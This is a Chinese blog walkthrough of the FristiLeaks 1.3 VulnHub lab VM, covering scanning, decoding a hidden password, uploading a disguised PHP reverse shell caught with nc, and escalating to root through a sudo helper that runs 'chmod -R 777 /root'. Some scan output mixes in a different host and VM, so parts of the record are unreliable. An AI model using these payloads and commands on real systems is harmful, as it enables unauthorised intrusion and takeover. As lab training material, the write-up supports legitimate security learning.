Please enable Javascript to view the contents

FristiLeaks: 1.3 vulnhub 练习记录

 ·  ☕ 6 分钟  ·  ✍️ IceKam · 👀... 阅读

环境介绍:

名称:FristiLeaks:1.3

日期:2015年12月14日

作者:Ar0xA

系列:FristiLeaks

说明:一个名为Fristileaks的荷兰非正式黑客聚会的小型VM。

无需调试器,逆向工程等即可在几个小时内完成。

信息搜集

获取目标

1
2
3
$ netdiscover -r 192.168.123.1/24

 192.168.123.55  08:00:27:a5:a6:76      1      60  PCS Systemtechnik GmbH                   

扫描

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
$ nmap -sV -p- 192.168.123.69 
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-07 09:37 CST
Nmap scan report for kioptrix2014.lan (192.168.123.69)
Host is up (0.00035s latency).
Not shown: 65532 filtered ports
PORT     STATE  SERVICE VERSION
22/tcp   closed ssh
80/tcp   open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
MAC Address: 00:0C:29:9E:B9:24 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 116.42 seconds
MB)
  • 80and8080,直接扫一波。

扫描目录信息

这次我们使用dirb吧,方便迅速。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
$ dirb http://192.168.123.55/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Wed Aug  7 16:29:24 2019
URL_BASE: http://192.168.123.55/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.123.55/ ----
+ http://192.168.123.55/cgi-bin/ (CODE:403|SIZE:210)                                        
==> DIRECTORY: http://192.168.123.55/images/                                                
+ http://192.168.123.55/index.html (CODE:200|SIZE:703)                                      
+ http://192.168.123.55/robots.txt (CODE:200|SIZE:62)                                       
                                                                                            
---- Entering directory: http://192.168.123.55/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Wed Aug  7 16:29:32 2019
DOWNLOADED: 4612 - FOUND: 3
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.123.69/ ----
+ http://192.168.123.69/cgi-bin/ (CODE:403|SIZE:210)                                        
+ http://192.168.123.69/index.html (CODE:200|SIZE:152)                                      
                                                                                            
-----------------
END_TIME: Wed Aug  7 09:38 6
  • 没有太大的收获。

脆弱性扫描

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
$ nikto -h http://192.168.123.55/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.123.55
+ Target Hostname:    192.168.123.55
+ Target Port:        80
+ Start Time:         2019-08-07 16:29:28 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
+ Server may leak inodes via ETags, header found with file /, inode: 12722, size: 703, mtime: Wed Nov 18 02:45:47 2015
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Entry '/cola/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/sisi/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/beer/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 3 entries which should be manually viewed.
+ PHP/5.3.3 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27, 7.1.13, 7.2.1 may also current release for each branch.
+ Apache/2.2.15 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE 
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8727 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time:           2019-08-07 16:29:51 (GMT8) (23 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

后台获取

首页贴的这张图和源码里面的用户名都可以搜集一下。

FristiLeaks

  • 最后组合字典fristi成功。

FristiLeaks fristi

  • 这个搞笑呀

代码审计一波

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
<!-- 
iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BAACx
jwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAARSSURBVHhe7dlRdtsgEIVhr8sL8nqymmwmi0kl
S0iAQGY0Nb01//dWSQyTgdxz2t5+AcCHHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixw
B4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL5kc+f
m63yaP7/XP/5RUM2jx7iMz1ZdqpguZHPl+zJO53b9+1gd/0TL2Wull5+RMpJq5tMTkE1paHlVXJJ
Zv7/d5i6qse0t9rWa6UMsR1+WrORl72DbdWKqZS0tMPqGl8LRhzyWjWkTFDPXFmulC7e81bxnNOvb
DpYzOMN1WqplLS0w+oaXwomXXtfhL8e6W+lrNdDFujoQNJ9XbKtHMpSUmn9BSeGf51bUcr6W+VjNd
jJQjcelwepPCjlLNXFpi8gktXfnVtYSd6UpINdPFCDlyKB3dyPLpSTVzZYnJR7R0WHEiFGv5NrDU
12qmC/1/Zz2ZWXi1abli0aLqjZdq5sqSxUgtWY7syq+u6UpINdOFeI5ENygbTfj+qDbc+QpG9c5
uvFQzV5aM15LlyMrfnrPU12qmC+Ucqd+g6E1JNsX16/i/6BtvvEQzF5YM2JLhyMLz4sNNtp/pSkg1
04VajmwziEdZvmSz9E0YbzbI/FSycgVSzZiXDNmS4cjCni+kLRnqizXThUqOhEkso2k5pGy00aLq
i1n+skSqGfOSIVsKC5Zv4+XH36vQzbl0V0t9rWb6EMyRaLLp+Bbhy31k8SBbjqpUNSHVjHXJmC2Fg
tOH0drysrz404sdLPW1mulDLUdSpdEsk5vf5Gtqg1xnfX88tu/PZy7VjHXJmC21H9lWvBBfdZb6Ws
30oZ0jk3y+pQ9fnEG4lNOco9UnY5dqxrhk0JZKezwdNwqfnv6AOUN9sWb6UMyR5zT2B+lwDh++Fl
3K/U+z2uFJNWNcMmhLzUe2v6n/dAWG+mLN9KGWI9EcKsMJl6o6+ecH8dv0Uu4PnkqDl2rGuiS8HK
ul9iMrFG9gqa/VTB8qORLuSTqF7fYU7tgsn/4+zfhV6aiiIsczlGrGvGTIlsLLhiPbnh6KnLDU12q
mD+0cKQ8nunpVcZ21Rj7erEz0WqoZ+5IRW1oXNB3Z/vBMWulSfYlm+hDLkcIAtuHEUzu/l9l867X34
rPtA6lmLi0ZrqX6gu37aIukRkVaylRfqpk+9HNkH85hNocTKC4P31Vebhd8fy/VzOTCkqeBWlrrFhe
EPdMjO3SSys7XVF+qmT5UcmT9+Ss//fyyOLU3kWoGLd59ZKb6Us10IZMjAP5b5AgAL3IEgBc5AsCLH
AHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzk
CwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL3IEgBc5AsCLHAHgRY4A8Pn9/QNa7zik1qtycQAAAABJR
U5ErkJggg==
-->
  • 查看源码有段base64编码的东东,解码一波。
1
$ echo 'iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAARSSURBVHhe7dlRdtsgEIVhr8sL8nqymmwmi0klS0iAQGY0Nb01//dWSQyTgdxz2t5+AcCHHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL5kc+fm63yaP7/XP/5RUM2jx7iMz1ZdqpguZHPl+zJO53b9+1gd/0TL2Wull5+RMpJq5tMTkE1paHlVXJJZv7/d5i6qse0t9rWa6UMsR1+WrORl72DbdWKqZS0tMPqGl8LRhzyWjWkTFDPXFmulC7e81bxnNOvbDpYzOMN1WqplLS0w+oaXwomXXtfhL8e6W+lrNdDFujoQNJ9XbKtHMpSUmn9BSeGf51bUcr6W+VjNdjJQjcelwepPCjlLNXFpi8gktXfnVtYSd6UpINdPFCDlyKB3dyPLpSTVzZYnJR7R0WHEiFGv5NrDU12qmC/1/Zz2ZWXi1abli0aLqjZdq5sqSxUgtWY7syq+u6UpINdOFeI5ENygbTfj+qDbc+QpG9c5uvFQzV5aM15LlyMrfnrPU12qmC+Ucqd+g6E1JNsX16/i/6BtvvEQzF5YM2JLhyMLz4sNNtp/pSkg104VajmwziEdZvmSz9E0YbzbI/FSycgVSzZiXDNmS4cjCni+kLRnqizXThUqOhEkso2k5pGy00aLqi1n+skSqGfOSIVsKC5Zv4+XH36vQzbl0V0t9rWb6EMyRaLLp+Bbhy31k8SBbjqpUNSHVjHXJmC2FgtOH0drysrz404sdLPW1mulDLUdSpdEsk5vf5Gtqg1xnfX88tu/PZy7VjHXJmC21H9lWvBBfdZb6Ws30oZ0jk3y+pQ9fnEG4lNOco9UnY5dqxrhk0JZKezwdNwqfnv6AOUN9sWb6UMyR5zT2B+lwDh++Fl3K/U+z2uFJNWNcMmhLzUe2v6n/dAWG+mLN9KGWI9EcKsMJl6o6+ecH8dv0Uu4PnkqDl2rGuiS8HKul9iMrFG9gqa/VTB8qORLuSTqF7fYU7tgsn/4+zfhV6aiiIsczlGrGvGTIlsLLhiPbnh6KnLDU12qmD+0cKQ8nunpVcZ21Rj7erEz0WqoZ+5IRW1oXNB3Z/vBMWulSfYlm+hDLkcIAtuHEUzu/l9l867X34rPtA6lmLi0ZrqX6gu37aIukRkVaylRfqpk+9HNkH85hNocTKC4P31Vebhd8fy/VzOTCkqeBWlrrFheEPdMjO3SSys7XVF+qmT5UcmT9+Ss//fyyOLU3kWoGLd59ZKb6Us10IZMjAP5b5AgAL3IEgBc5AsCLHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL3IEgBc5AsCLHAHgRY4A8Pn9/QNa7zik1qtycQAAAABJRU5ErkJggg==' | base64 -d > icekam.png
  • 刚开始解码发现是图片文件,于是乎我们输出为图片,得到以下文件。

FristiLeaks fristi

keKkeKKeKKeKkEkkEk

1
2

<center><h1> Welcome to #fristileaks admin portal</h1></center>
  • 注意头部admin

使用admin尝试登录并没有什么用处。

帐号猜解

  • 把首页底部提取的所有帐号都来试一下吧,可以用burp比较方便。

Fristileaks 2015-12-11 are:<br> 
@meneer, @barrebas, @rikvduijn, @wez3forsec, @PyroBatNL, @0xDUDE, @annejanbrouwer, @Sander2121, Reinierk, @DearCharles, @miamat, MisterXE, BasB, Dwight, Egeltje, @pdersjant, @tcp130x10, @spierenburg, @ielmatani, @renepieters, Mystery guest, @EQ_uinix, @WhatSecurity, @mramsmee,eezeepz
  • 结果:name:eezeepz,pass:keKkeKKeKKeKkEkkEk

登录后获取到一个上传的页面。

上传shell

  • 看了下有解析漏洞,直接上传一个图片会自动解析成php。

这里我使用的是php-reverse-shell.php。

1
2
3
4
5
6
7
8
$ cp /usr/share/webshells/php/php-reverse-shell.php .     

$ pluma php-reverse-shell.php   //改成客户端的ip端口。

$ip = '127.0.0.1';  //  你的ip
$port = 1234;       // 端口

$ mv php-reverse-shell.php icekam.php.jpg
  • 把后缀改为jpg上传。

反弹shell

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
$ nc -lvp 6666
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::6666
Ncat: Listening on 0.0.0.0:6666

$ curl http://192.168.123.55/fristi/uploads/icekam.php.jpg

Linux localhost.localdomain 2.6.32-573.8.1.el6.x86_64 #1 SMP Tue Nov 10 18:01:38 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
 13:04:25 up  2:22,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh: no job control in this shell
sh-4.1$ 
  • 反弹成功

提权

信息搜集

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
Linux localhost.localdomain 2.6.32-573.8.1.el6.x86_64 #1 SMP Tue Nov 10 18:01:38 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

sh-4.1$ cd /home
cd /home
sh-4.1$ ls -la
ls -la
total 28
drwxr-xr-x.  5 root      root       4096 Nov 19  2015 .
dr-xr-xr-x. 22 root      root       4096 Aug  7 10:42 ..
drwxrwxrwx.  2 admin     admin      4096 Aug  7 11:30 admin
drwx---r-x.  5 eezeepz   eezeepz   12288 Nov 18  2015 eezeepz
drwx------   2 fristigod fristigod  4096 Nov 19  2015 fristigo

sh-4.1$ cd root
cd root
sh-4.1$ ls
ls
fristileaks_secrets.txt
sh-4.1$ ls -la
ls -la
total 48
drwxrwxrwx.  3 root root 4096 Nov 25  2015 .
dr-xr-xr-x. 22 root root 4096 Aug  7 10:42 ..
-rwxrwxrwx   1 root root 1936 Nov 25  2015 .bash_history
-rwxrwxrwx.  1 root root   18 May 20  2009 .bash_logout
-rwxrwxrwx.  1 root root  176 May 20  2009 .bash_profile
-rwxrwxrwx.  1 root root  176 Sep 22  2004 .bashrc
drwxrwxrwx.  3 root root 4096 Nov 25  2015 .c
-rwxrwxrwx.  1 root root  100 Sep 22  2004 .cshrc
-rwxrwxrwx.  1 root root 1291 Nov 17  2015 .mysql_history
-rwxrwxrwx.  1 root root  129 Dec  3  2004 .tcshrc
-rwxrwxrwx.  1 root root  829 Nov 17  2015 .viminfo
-rwxrwxrwx.  1 root root  246 Nov 17  2015 fristileaks_secrets.txt
sh-4.1$ 

flag1

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
sh-4.1$ cat fristileaks_secrets.txt
cat fristileaks_secrets.txt
Congratulations on beating FristiLeaks 1.0 by Ar0xA [https://tldr.nu]

I wonder if you beat it in the maximum 4 hours it's supposed to take!

Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode)


Flag: Y0u_kn0w_y0u_l0ve_fr1st1

继续搜集信息

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
sh-4.1$ cd /home
cd /home
sh-4.1$ ls
ls
admin
eezeepz
fristigod
sh-4.1$ cd admin
cd admin
sh-4.1$ ls -la
ls -la
total 656
drwxrwxrwx. 2 admin     admin       4096 Aug  7 11:30 .
drwxr-xr-x. 5 root      root        4096 Nov 19  2015 ..
-rw-------  1 admin     admin        159 Aug  7 11:30 .bash_history
-rw-r--r--. 1 admin     admin         18 Sep 22  2015 .bash_logout
-rw-r--r--. 1 admin     admin        176 Sep 22  2015 .bash_profile
-rw-r--r--. 1 admin     admin        124 Sep 22  2015 .bashrc
-rwxr-xr-x  1 admin     admin      45224 Nov 18  2015 cat
-rwxr-xr-x  1 admin     admin      48712 Nov 18  2015 chmod
-rw-r--r--  1 admin     admin        737 Nov 18  2015 cronjob.py
-rw-r--r--  1 admin     admin         21 Nov 18  2015 cryptedpass.txt
-rw-r--r--  1 admin     admin        258 Nov 18  2015 cryptpass.py
-rwxr-xr-x  1 admin     admin      90544 Nov 18  2015 df
-rwxr-xr-x  1 admin     admin      24136 Nov 18  2015 echo
-rwxr-xr-x  1 admin     admin     163600 Nov 18  2015 egrep
-rwxr-xr-x  1 admin     admin     163600 Nov 18  2015 grep
-rwxr-xr-x  1 admin     admin      85304 Nov 18  2015 ps
-rw-r--r--  1 fristigod fristigod     25 Nov 19  2015 whoisyourgodnow.txt
sh-4.1$ cat cryptedpass.txt
cat cryptedpass.txt
mVGZ3O3omkJLmy2pcuTq
sh-4.1$ cat whoisyourgodnow.txt
cat whoisyourgodnow.txt
=RFn0AKnlMHMPIzpyuTI0ITG
sh-4.1$ cat cryptpass.py
cat cryptpass.py
#Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn
import base64,codecs,sys

def encodeString(str):
    base64string= base64.b64encode(str)
    return codecs.encode(base64string[::-1], 'rot13')

cryptoResult=encodeString(sys.argv[1])
print cryptoResult
sh-4.1$ 
  • 看得出来上面是两个密文,下面是一个加密的脚本,我们改改尝试解密。
1
2
3
4
5
6
7
8
9

import base64,codecs,sys

def encodeString(str):
    decoded = codecs.decode(str[::-1], 'rot13')
    return base64.b64decode(decoded)    // 这里

cryptoResult=encodeString(sys.argv[1])
print cryptoResult
  • 解密
1
2
3
4
5
$ python exp.py mVGZ3O3omkJLmy2pcuTq
thisisalsopw123

$ python exp.py =RFn0AKnlMHMPIzpyuTI0ITG
LetThereBeFristi!

穷举

home 下

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
cd /home 
sh-4.1$ ls -la
ls -la
total 28
drwxr-xr-x.  5 root      root       4096 Nov 19  2015 .
dr-xr-xr-x. 22 root      root       4096 Aug  7 10:42 ..
drwxrwxrwx.  2 admin     admin      4096 Aug  7 11:30 admin
drwx---r-x.  5 eezeepz   eezeepz   12288 Nov 18  2015 eezeepz
drwx------   2 fristigod fristigod  4096 Nov 19  2015 fristigod
sh-4.1$ 
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
sh-4.1$ su admin
su admin
standard in must be a tty
sh-4.1$ python -c "import pty; pty.spawn('/bin/bash')"
python -c "import pty; pty.spawn('/bin/bash')"
bash-4.1$ su admin
su admin
Password: thisisalsopw123

[admin@localhost home]$ 

[admin@localhost ~]$ su fristigod
su fristigod
Password: LetThereBeFristi!

bash-4.1$ 
  • 成功,然后提权root。
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
bash-4.1$ sudo -l
sudo -l
[sudo] password for fristigod: LetThereBeFristi!

Matching Defaults entries for fristigod on this host:
    requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS
    DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
    PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
    LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
    LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User fristigod may run the following commands on this host:
    (fristi : ALL) /var/fristigod/.secret_admin_stuff/doCom
bash-4.1$ 
  • 按照提示继续搜集
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
bash-4.1$ cd /var/fristigod/
cd /var/fristigod/
bash-4.1$ ls -la
ls -la
total 16
drwxr-x---   3 fristigod fristigod 4096 Nov 25  2015 .
drwxr-xr-x. 19 root      root      4096 Nov 19  2015 ..
-rw-------   1 fristigod fristigod 1181 Aug  7 11:30 .bash_history
drwxrwxr-x.  2 fristigod fristigod 4096 Nov 25  2015 .secret_admin_stuff
bash-4.1$ cat .bash_history
cat .bash_history
ls
pwd
ls -lah
cd .secret_admin_stuff/
ls
./doCom 
./doCom test
sudo ls
exit
cd .secret_admin_stuff/
ls
./doCom 
sudo -u fristi ./doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
sudo /var/fristigod/.secret_admin_stuff/doCom
exit
sudo /var/fristigod/.secret_admin_stuff/doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
groups
ls -lah
usermod -G fristigod fristi
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
less /var/log/secure e
Fexit
exit
exit
id
su
sudo -l
id
cd /var/fristigod/.secret_admin_stuff/doCom
cd /var/fristigod/
ls
ls -la
cat .bash_history
cd .secret_admin_stuff
ls
ls -la
cd doCom
sudo -u fristi ./doCom chmod -R 777 /root
ls
ls -l
sudo -u fristi ./doCom chmod -R 777 /root
ls -l /root
cat fristileaks_secrets.txt
cat /root/fristileaks_secrets.txt
bash-4.1$ 
1
2
3
4
5
6
7
8
9
bash-4.1$ cd .secret_admin_stuff
cd .secret_admin_stuff
bash-4.1$ ls -la
ls -la
total 16
drwxrwxr-x. 2 fristigod fristigod 4096 Nov 25  2015 .
drwxr-x---  3 fristigod fristigod 4096 Nov 25  2015 ..
-rwsr-sr-x  1 root      root      7529 Nov 25  2015 doCom
bash-4.1$ 
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
获得flag

cd doCom
sudo -u fristi ./doCom chmod -R 777 /root
ls
ls -l
sudo -u fristi ./doCom chmod -R 777 /root
ls -l /root
cat fristileaks_secrets.txt
cat /root/fristileaks_secrets.txt
bash-4.1$ ls -la
ls -la
total 16
drwxr-x---   3 fristigod fristigod 4096 Nov 25  2015 .
drwxr-xr-x. 19 root      root      4096 Nov 19  2015 ..
-rw-------   1 fristigod fristigod 1181 Aug  7 11:30 .bash_history
drwxrwxr-x.  2 fristigod fristigod 4096 Nov 25  2015 .secret_admin_stuff
bash-4.1$ cd .secret_admin_stuff
cd .secret_admin_stuff
bash-4.1$ ls -la
ls -la
total 16
drwxrwxr-x. 2 fristigod fristigod 4096 Nov 25  2015 .
drwxr-x---  3 fristigod fristigod 4096 Nov 25  2015 ..
-rwsr-sr-x  1 root      root      7529 Nov 25  2015 doCom
bash-4.1$ sudo -u fristi ./doCom chmod -R 777 /root
sudo -u fristi ./doCom chmod -R 777 /root
bash-4.1$ ls -l /root
ls -l /root
total 4
-rwxrwxrwx. 1 root root 246 Nov 17  2015 fristileaks_secrets.txt
bash-4.1$ ls -l /root
ls -l /root
total 4
-rwxrwxrwx. 1 root root 246 Nov 17  2015 fristileaks_secrets.txt
bash-4.1$ cd /root
cd /root
bash-4.1$ ls
ls
fristileaks_secrets.txt
bash-4.1$ cat fristileaks_secrets.txt
cat fristileaks_secrets.txt
Congratulations on beating FristiLeaks 1.0 by Ar0xA [https://tldr.nu]

I wonder if you beat it in the maximum 4 hours it's supposed to take!

Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode)


Flag: Y0u_kn0w_y0u_l0ve_fr1st1

心得

这个主要考验信息搜集能力,漏洞这一块占比较少。

分享
您的鼓励是我最大的动力
bitcoin QR Code

icekam
作者
IceKam
茶艺品鉴砖家,低端码字人口。